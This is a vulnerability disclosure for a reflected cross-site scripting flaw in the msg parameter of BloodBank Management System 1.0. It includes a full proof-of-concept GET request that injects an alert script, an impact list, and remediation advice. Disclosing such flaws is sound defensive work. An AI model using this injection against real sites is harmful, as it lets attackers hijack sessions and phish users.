- BloodBank Management System: 1.0
- Vulnerability Type: Cross-Site Scripting (XSS)
- Severity: HIGH
- Status: Unpatched
- Path:
/bloodrequest.php?msg=
A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the blood request functionality of the BloodBank Management System. This flaw occurs because the msg
parameter is not properly sanitized before being rendered on the web page. This allows an attacker to inject malicious JavaScript code, which will be executed when the page is accessed.
Successful exploitation can lead to session hijacking, redirection to phishing sites, or unauthorized actions on behalf of the victim. Additionally, this could be exploited for social engineering attacks or to spread malware.
Below is an example of a GET request that injects JavaScript code via the msg
parameter:
GET /bloodrequest.php?msg=%3cscript%3ealert(%22xss%22)%3c%2fscript%3e%20have%20logged%20in. HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/login.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
When this request is executed, the following script will be injected into the page:
<script>alert("xss")</script>
This will trigger a JavaScript alert as a demonstration of the vulnerability.
- Session Hijacking: An attacker could steal session cookies and impersonate users.
- Phishing Attacks: Victims could be redirected to malicious sites to steal credentials.
- Malware Spread: Malicious scripts could be executed on the client’s browser.
- Data Manipulation: Attackers could modify the content displayed to users.
- Reputational Damage: Users may lose trust in the system due to malicious behavior.
- Input Validation and Sanitization: Sanitize all user input by escaping special characters like
<
,>
, and"
. - Use HTTP Headers: Implement a Content Security Policy (CSP) to prevent script execution from unauthorized sources.
- Encoding Output: Properly encode dynamic content before rendering it on web pages to prevent script injection.
- Use Prepared Statements: Avoid dynamically building HTML with user-provided data.
- Security Testing: Perform regular penetration testing to identify and fix XSS vulnerabilities early.